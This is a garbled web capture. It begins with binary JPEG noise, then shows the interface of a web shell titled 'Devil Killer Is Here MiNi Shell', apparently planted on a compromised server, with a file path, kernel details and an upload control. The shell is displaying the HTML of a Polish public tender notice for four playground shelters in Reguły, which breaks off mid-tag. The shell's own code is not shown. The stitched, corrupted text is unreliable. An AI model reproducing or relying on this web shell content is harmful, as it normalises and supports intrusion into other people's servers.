JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/home/vmanager/www/common/web/tenders/20250528/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/home/vmanager/www/common/web/tenders/20250528/0025127501-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa 4 wiat na placu zabaw w Regułach </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA MICHAŁOWICE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 013269290</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Aleja Powstańców Warszawy 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Reguły</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-816</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL913 - Warszawski zachodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@michalowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.michalowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa 4 wiat na placu zabaw w Regułach </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ca31cafb-7376-4a37-b4ab-cfb11417f89a</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00251275</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00033178/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Budowa wiaty na terenie placu zabaw w Regułach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.michalowice.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1114459</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.Informacje ogólne: 1) W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu Platformy zakupowej, która jest dostępna pod adresem https://platformazakupowa.pl. 2) Wykonawca zamierzający wziąć udział w<br/>postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie zakupowej. 3) Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem: https://platformazakupowa.pl/strona/45-instrukcje. <br/>4) Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na https://platformazakupowa.pl., ani logowania. 5) Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy zakupowej oraz wymagania aplikacyjne umożliwiające pracę na Platformazakupowa.pl tj.: a) stały dostęp do sieci<br/>Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s; b) komputer klasy PC lub MAC o następującej konfiguracji:<br/>pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z systemów operacyjnych - MS Windows 7, Mac Osx<br/>10 4, Linux, lub ich nowsze wersje; c) zainstalowana dowolna, inna przeglądarka internetowa niż Internet Explorer; d) włączona<br/>obsługa JavaScript; e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf; f) Szyfrowanie na<br/>platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3; g) Oznaczenie czasu odbioru danych przez platformę zakupową<br/>stanowi datę oraz dokładny czas (hh:mm:ss) generowany wg. czasu lokalnego serwera synchronizowanego z zegarem Głównego<br/>Urzędu Miar. 6) Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania podpisu osobistego, który wynosi max 5MB. 7) Maksymalny rozmiar jednego pliku przesyłanego za pośrednictwem dedykowanych<br/>formularzy do: złożenia, wycofania oferty wynosi 150 MB natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB. 8) W<br/>przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy użytkownicy mogą skorzystać ze wsparcia<br/>technicznego Centrum Wsparcia Klienta dostępnego pod numerem telefonu (22) 101 02 02 lub drogą elektroniczną na adres<br/>cwk@platformazakupowa.pl, oraz poprzez formularz udostępniony na stronie internetowej https://platformazakupowa.pl/strona/kontakt w zakładce „Prześlij zgłoszenie”. 2. Zamawiający nie przewiduje sposobu<br/>komunikowania się z Wykonawcami w inny sposób niż przy użyciu środków komunikacji elektronicznej wskazanych w SWZ. 3.<br/>Zamawiający informuje, że instrukcje korzystania z platformazakupowa.pl dotyczące w szczególności logowania, składania<br/>wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje. 4. Wykonawca, przystępując do niniejszego postępowania o udzielenie<br/>zamówienia publicznego: 1) akceptuje warunki korzystania z platformazakupowa.pl określone w Regulaminie zamieszczonym na<br/>stronie internetowej https://platformazakupowa.pl// w zakładce „Regulamin&#34; oraz uznaje go za wiążący, 2) zapoznał i stosuje się do Instrukcji składania<br/>ofert/wniosków dostępnej na stronie internetowej https://platformazakupowa.pl//. 5. Wykonawca jako podmiot profesjonalny ma obowiązek sprawdzania komunikatów i wiadomości bezpośrednio na platformazakupowa.pl przesłanych przez Zamawiającego, gdyż<br/>system powiadomień może ulec awarii lub powiadomienie może trafić do folderu SPAM.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Obowiązek informacyjny wynikający z art. 13 RODO dotyczący zbierania danych<br/>osobowych bezpośrednio od osoby fizycznej, której dane dotyczą, w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego Zamawiający informuje, że: Urząd Gminy Michałowice reprezentowany przez Wójta Gminy przetwarza dane zawarte w<br/>ofertach, znajdujące się w publicznie dostępnych rejestrach (Krajowy Rejestr Sądowy, Centralna Ewidencja i Informacja o<br/>Działalności Gospodarczej RP, Krajowy Rejestr Karny) w celu prowadzenia postępowań w sprawie zamówienia publicznego na<br/>postawie przepisów ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych. Wśród tych informacji mogą pojawić się<br/>dane, które na gruncie rozporządzenia Parlamentu Europejskiego i Rady Unii Europejskiej 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (dalej: „Ogólne Rozporządzenie” lub „RODO”), mają charakter danych osobowych. W świetle<br/>powyższego Wójt Gminy informuje, że: 1. Administratorem danych osobowych (dalej: „Administrator”) jest GMINA MICHAŁOWICE<br/>05-816 Michałowice, Reguły ul. Aleja Powstańców Warszawy 1 tel. 22 350 91 91; fax: 22 350 91 01 e-mail:<br/>sekretariat@michalowice.pl 2. W sprawach związanych z Pani/Pana danymi proszę kontaktować się z Inspektorem Ochrony Danych<br/>Panem Piotrem Glen, kontakt pisemny za pomocą poczty tradycyjnej na adres wskazany powyżej bądź email:<br/>daneosobowe@michalowice.pl; 3. Dane osobowe zawarte w ofertach są przetwarzane na podstawie art. 6 ust. 1 lit. c RODO, tj. przetwarzanie jest niezbędne do wypełnienia obowiązku prawnego ciążącego na administratorze oraz następujące przepisy prawa:<br/>ustawa z dnia 11 września 2019 r. - Prawo zamówień publicznych (Dz.U. Dz.U. 2024 poz. 1320), rozporządzenia Ministra Rozwoju,<br/>Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy (Dz.U. 2020 poz. 2415), ustawa o narodowym zasobie archiwalnym i<br/>archiwach (tj. Dz.U. 2020 poz. 164 ze zm.). 4. Celem przetwarzania danych osobowych jest prowadzenie w imieniu własnym<br/>postępowań o udzielenie zamówień publicznych. Przetwarzanie danych osobowych na potrzeby ww. postępowań mieści się w<br/>zakresie obowiązków ustawowych Urzędu Gminy jako zamawiającego w rozumieniu art. 4 ust. 1 ustawy PZP. Przetwarzanie tych<br/>danych jest niezbędne, aby Urząd Gminy mógł prawidłowo wypełniać nałożone na nie obowiązki.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">1. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu<br/>umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy Pzp, do upływu terminu do ich<br/>wniesienia. 2. W przypadku, gdy wykonanie obowiązków, o których mowa w art. 15 ust. 1-3 RODO wymagałoby niewspółmiernie<br/>dużego wysiłku, zamawiający może żądać od osoby, której dane dotyczą, wskazania dodatkowych informacji mających na celu<br/>sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego.<br/>3.Skorzystanie przez osobę, której dane dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym<br/>mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą. 4. Wystąpienie z żądaniem, o którym mowa w art. 18 ust. 1 RODO, nie<br/>ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego. 5. Zasada<br/>jawności, o której mowa w art. 74 Pzp ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w<br/>art. 9 ust. 1 RODO, zebranych w toku postępowania o udzielenie zamówienia publicznego. Ograniczenia zasady jawności, o których<br/>mowa w ust. 3 i art. 18 ust. 3–6, stosuje się odpowiednio.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.14.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiot zamówienia polega na budowie 4 wiat na placu zabaw w Regułach.<br/>2.	Plac zabaw zlokalizowany jest przy alei Samorządu Terytorialnego na terenie działki nr ew. 616/10 (obr. 0013), gmina Michałowice.<br/>3.	Zakres przedmiotu zamówienia obejmuje m.in.:<br/>1)	Budowa fundamentów; <br/>2)	Budowa czterech wiat z drewna typu BSH ;<br/>3)	Montaż wyposażenia wiat<br/>4.	Przedmiot zamówienia zostanie wykonany na podstawie załączonej dokumentacji, określającej zakres przedmiotu umowy:<br/>1)	Projekt zagospodarowania terenu;<br/>2)	Projekt architektoniczno - budowlany;<br/>3)	Projekt techniczny;<br/>4)	Projekt wykonawczy;<br/>5)	STWiORB;<br/>6)	Przedmiar;<br/>7)	Decyzja nr 1345/2024 z dn. 19.09.2024 r.;<br/>5.	Wykonawca w ramach realizacji zadania zobowiązany jest:<br/>1) zapewnić bezpieczną organizację prac;<br/>2) zabezpieczyć teren robót w okresie trwania realizacji zadania, aż do zakończenia i odbioru ostatecznego robót;<br/>3) bezwzględnie stosować się do treści wszystkich uzgodnień wydanych przez osoby upoważnione przez Zamawiającego;<br/>4) znać i stosować w czasie prowadzenia robót wszelkie przepisy dotyczące ochrony środowiska naturalnego;<br/>5) materiały pochodzące z rozbiórek zobowiązany będzie poddać utylizacji.; <br/>6)	uwzględnić w wynagrodzeniu koszty utrzymania terenu budowy, koszty urządzenia i utrzymania zaplecza budowy, koszty uzgodnień, odbiorów, wyłączeń, badań w celu wykonania zamówienia, koszty obsługi geodezyjnej i geotechnicznej, koszty zabezpieczenia budowy oraz przygotowania dokumentacji powykonawczej oraz koszty utylizacji materiałów pochodzących z rozbiórek;<br/>7) wykonać na swój koszt schematy lub rysunki robocze, warsztatowe jeśli uzna to za konieczne dla wykonania robót lub ich części;<br/>8) zapewnić, na własny koszt obsługę jednostek naukowo-badawczych, o ile zajdzie taka potrzeba dla danego zakresu robót;<br/>9) dostarczyć Zamawiającemu w dniu zawarcia umowy, oświadczenie Kierownika budowy o przejęciu obowiązku kierowania budową; <br/>10) zapewnić realizację robót w sposób zapewniający bezpieczeństwo osób przebywających na lub w pobliżu terenu robót oraz przemieszczających się w pobliżu miejsca realizacji Przedmiotu zamówienia.<br/>6.	Teren prac pozbawiony jest dostepu do wody i instalacji elektrycznej w zwiazku z tym Wykonawca zobowiazany będzie do zapewnienia tych mediów we własnym zakresie i na własny koszt (agregaty pradotwórcze, beczkowozy).<br/>7.	Materiały i urządzenia użyte do wykonania przedmiotu zamówienia powinny posiadać świadectwo dopuszczenia do stosowania na terenie Rzeczypospolitej Polskiej oraz spełniać wymogi określone w Ustawie z dnia 07.07.1994 r. - Prawo Budowlane (t.j. Dz. U. z 2024 r., poz. 725 ze zm.).<br/>8.	W ramach Przedmiotu zamówienia, Wykonawca zobowiązany jest do wykonania robót budowlanych, a po ich ukończeniu uzyskać i przekazać Zamawiającemu decyzję administracyjną właściwą dla kategorii obiektu umożliwiająca legalne użytkowanie.<br/>9.	Wykonawca zobowiązuje się wykonać wszystkie roboty budowlane opisane w dokumentacji niezbędne do realizacji przedmiotu zamówienia<br/>10.	Wykonawca zobowiązany jest do codziennego zabezpieczenia, uporządkowania i utrzymania w czystości terenu po zakończeniu prac.<br/>11.	Wykonawca zobowiązany jest do należytego zabezpieczenia terenu prowadzenia prac i interesów osób trzecich, zapewnienia warunków bezpieczeństwa związanego z ich realizacją oraz właściwej ochrony środowiska.<br/>12.	Wykonawca zobowiązany jest wykonać przedmiot zamówienia zgodnie z obowiązującymi normami, przepisami prawa i wiedzą techniczną, a także w sposób zapewniający bezpieczeństwo użytkowników oraz osób trzecich.<br/>13.	Za bezpieczeństwo na terenie robót, od chwili rozpoczęcia, aż do ich oddania, odpowiedzialny jest Wykonawca.<br/>14.	Wszelkie użyte materiały i urządzenia winny być dopuszczone do stosowania zgodnie z obowiązującymi przepisami prawa. Na każde żądanie Zamawiającego Wykonawca zobowiązany jest okazać w stosunku do wskazanych materiałów i urządzeń dokumenty potwierdzające ich dopuszczenie do stosowania tj. np.: certyfikaty zgodności z Polską Normą, deklaracje właściwości użytkowych, atesty. <br/>15.	Na terenie prowadzonych robót Wykonawca zobowiązany jest zabezpieczyć wszystkie drzewa, krzewy oraz rośliny wieloletnie (ochrona również bryły korzeniowej), które znajdują się w miejscach, gdzie może nastąpić ich uszkodzenie oraz prowadzić prace w sposób ograniczający do minimum zniszczenie powierzchni biologicznie czynnej.<br/>16.	Na terenie prowadzonych robót Wykonawca zobowiązany jest zabezpieczyć wszystkie urządzenia stanowiące wyposażenie placu zabaw oraz elementy nawierzchni. W przypadku konieczności demontażu należy przywrócić dany zakres elementów do stanu z przed rozpoczęcia robót.<br/>17.	Wykonawca zobowiązany będzie do odtworzenia powierzchni biologicznie czynnej oraz do usunięcia uszkodzonych roślin i posadzenia nowych roślin w uzgodnieniu z Inspektorem ds. zieleni /Referatem Ochrony Środowiska Urzędu Gminy Michałowice na swój koszt (jeżeli dotyczy).<br/>18.	Wykonawca przez cały czas realizowania zamówienia jest zobowiązany do dysponowania odpowiednią liczbą personelu. Zamawiający nie będzie uwzględniał przedłużenia terminowego wykonania zamówienia z powodu niedyspozycyjności personelu (absencja pracownicza). W takich sytuacjach Zamawiający będzie naliczał kary zgodnie z zawartą Umową.<br/>19.	Wykonawca przez cały czas realizowania zamówienia jest zobowiązany do bieżącego sprzątania i wywożenia materiałów z budowy, drogi dojazdowej do budowy oraz otoczenia budowy; posprzątanie terenu budowy, drogi dojazdowej oraz otoczenia budowy po zakończeniu robót oraz wywiezienie niewykorzystanych materiałów z budowy; w przypadku niewywiązywania się z tego obowiązku, Zamawiający obciąży Wykonawcę kosztami sprzątania i wywiezienia materiałów pozostawionych na terenie budowy.<br/>20.	Wykonawca w trakcie realizacji Przedmiotu umowy ma obowiązek poddania odpadów budowlanych odzyskowi, a jeżeli z przyczyn technologicznych jest to niemożliwe lub nieuzasadnione z przyczyn ekologicznych lub ekonomicznych, to Wykonawca zobowiązany jest do przekazania na własny koszt powstałych odpadów do utylizacji. Wykonawca ma obowiązek przedstawienia dokumentów potwierdzających oddanie odpadów podmiotowi uprawnionemu do ich odbioru i przetwarzania. Wykonawca jest wytwórcą odpadów w rozumieniu przepisów ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz.U. z 2021 r. poz. 779).<br/>21.	Wykonawca ponosi pełną odpowiedzialność, chyba że szkoda powstała z wyłącznej winy Zamawiającego, za:<br/>1)	stan i przestrzeganie przepisów bhp, ochronę p.poż. i dozór mienia na terenie robót, jak i za wszelkie szkody powstałe w trakcie trwania robót na terenie przyjętym od Zamawiającego lub mających związek z prowadzonymi robotami, chyba że szkoda powstała z wyłącznej winy Zamawiającego,<br/>2)	bezpieczeństwo wszelkich działań prowadzonych na terenie robót i poza nim, a związanych z wykonaniem Przedmiotu umowy,<br/>3)	szkody oraz następstwa nieszczęśliwych wypadków pracowników i osób trzecich, powstałe w związku z prowadzonymi robotami, chyba że szkoda powstała z wyłącznej winy Zamawiającego, <br/>4)	wszelkie szkody wyrządzone posiadaczom nieruchomości przyległych, chyba że szkoda powstała z wyłącznej winy Zamawiającego, <br/>5)	wszelkie szkody będące następstwem niewykonania lub nienależytego wykonania Przedmiotu umowy, które to szkody Wykonawca zobowiązuje się pokryć w pełnej wysokości, chyba że szkoda powstała z wyłącznej winy Zamawiającego, <br/>6)	uszkodzenia lub zniszczenia z winy Wykonawcy obiektów, dróg i terenu, a także urządzeń i wbudowanej aparatury, chyba że szkoda powstała z wyłącznej winy Zamawiającego, <br/>7)	działania i zaniechania Wykonawcy, jego pracowników i Podwykonawców oraz dalszych podwykonawców, przy wykonywaniu obowiązków umownych, ustawowych i innych, które zostały nałożone w trybie administracyjnym;<br/>8)	opracowanie planu bezpieczeństwa pracy i ochrony zdrowia dla budowy i zaplecza, zgodnie z wymaganiami określonymi w rozporządzeniu Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony.<br/>22.	W przypadku, w którym w trakcie realizacji Przedmiotu umowy dojdzie do kontaktu z osobą ze szczególnymi potrzebami w rozumieniu ustawy z dnia 19 lipca 2019 r. o zapewnieniu dostępności osobom ze szczególnymi potrzebami (Dz.U. z 2022 r. poz. 2240 ze zm.), Wykonawca zobowiązuje się do realizacji Przedmiotu umowy z uwzględnieniem warunków dostępności, w szczególności poprzez: <br/>1)	zapewnienie wolnych od barier poziomych i pionowych przestrzeni komunikacyjnych, <br/>2)	zapewnienie osobie ze szczególnymi potrzebami wsparcia innej osoby podczas wykonywania czynności, będących Przedmiotem umowy lub przemieszczającej się w okolicach lub przez teren robót. <br/>3)	Wykonawca zobowiązuje się do uwzględnienia w przedmiocie zamówienia w zakresie dostępności architektonicznej rozwiązań uwzględniających warunki dostępności dla osób ze szczególnymi potrzebami w rozumieniu ustawy z dnia 19 lipca 2019 r. o zapewnieniu dostępności osobom ze szczególnymi potrzebami (t.j. Dz.U. z 2022 r. poz. 2240), w szczególności poprzez:<br/>4)	zapewnienie wolnych od barier poziomych i pionowych przestrzeni komunikacyjnych,<br/>5)	instalację urządzeń lub zastosowanie środków technicznych i rozwiązań architektonicznych, które umożliwiają dostęp do wszystkich miejsc przeznaczonych do pobytu ludzi,,<br/>6)	zapewnienie wstępu osobie korzystającej z psa asystującego, o którym mowa w art. 2 pkt 11 ustawy z dnia 27 sierpnia 1997 r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu osób niepełnosprawnych (Dz. U. z 2024 r. poz. 44 ze zm.),<br/>7)	zapewnienie osobom ze szczególnymi potrzebami możliwości ewakuacji lub ich uratowania w inny sposób. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45112723-9 - Roboty w zakresie kształtowania placów zabaw</span></h3> <h3 